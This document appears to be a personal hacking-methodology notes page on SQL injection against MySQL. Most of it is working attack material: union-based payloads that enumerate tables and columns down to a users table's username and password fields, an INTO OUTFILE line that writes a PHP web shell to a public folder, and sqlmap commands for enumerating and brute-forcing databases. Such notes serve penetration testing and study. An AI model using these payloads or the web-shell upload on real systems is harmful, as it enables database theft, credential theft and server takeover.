SQL Injection :: My notes and snippets

> Notes > Hacking Methodology > General > SQL Injection

sql injection

SQL injection usually occurs when you ask a user for input, like their username/userid, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.

External stuff

exploit-db ASCII table

Always True

1=1 a=a

Escape/stop

mysql

# 
-- 
#--

MySQL Verison

select version()

information Schema

Table names

SELECT table_schema,table_name FROM information_Schema.tables

SELECT CONCAT(table_schema,table_name) FROM information_Schema.tables

SELECT CONCAT(table_schema,char(58),table_name) FROM information_Schema.tables

Injection example 1

' union (select CONCAT(table_schema,char(58),table_name) from information_Schema.tables where 1=1 ORDER BY table_name LIMIT 0,1) #--

dummymalex:dummyms
table_schema = dummymalex
table_name   = dummyms

Hide stuff we dont need

AND table_schema != 'information_schema'

Injection example 2

' union (select CONCAT(table_schema,char(58),table_name) from information_Schema.tables where 1=1 AND table_schema != 'information_schema' ORDER BY table_name LIMIT 0,1) #--

LIMIT 0,1
dummymalex:dummyms 
table_schema = dummymalex
table_name   = dummyms 

LIMIT 1,1 
dummymalex:users     
table_schema = dummymalex
table_name   = users

column_name

SELECT column_schema,column_name FROM information_Schema.columns

Injection Example 1

' union (select CONCAT(column_name) from information_Schema.columns where table_name='dummyms' LIMIT 0,1) #--

LIMIT 0,1
ID

LIMIT 1,1
dummyms

LIMIT 2,1
description

Injection Example 2

' union (select CONCAT(column_name) from information_Schema.columns where table_name='users' LIMIT 0,1) #--

LIMIT 0,1
ID

LIMIT 1,1
username

LIMIT 2,1
password

upload shell with INTO OUTFILE

select 'SHELLCODE' INTO OUTFILE '/path/to/public/folder/shell.php';

SQLmap

Simple usage

sqlmap -u "http://target_server/"

Set target DBMS to MySQL

sqlmap -u "http://target_server/" --dbms=mysql

Use POST requests

sqlmap -u "http://target_server/" --data=param1=value1&param2=value2

Use POST request file

sqlmap -r request.txt -p [param-to-test]

Batch run

sqlmap -r request.txt -p [param-to-test] --Batch

Set Risk/Level

sqlmap -r request.txt -p psw --level=5 --risk=3 --dbms mysql --batch

enumerate databases

sqlmap -r request.txt --batch --dbs

enumerate tables

sqlmap -r request.txt -batch --tables

brute-force tables

sqlmap -r request.txt -batch --common-tables

brute-force columns

sqlmap -r request.txt -batch -T users --common-column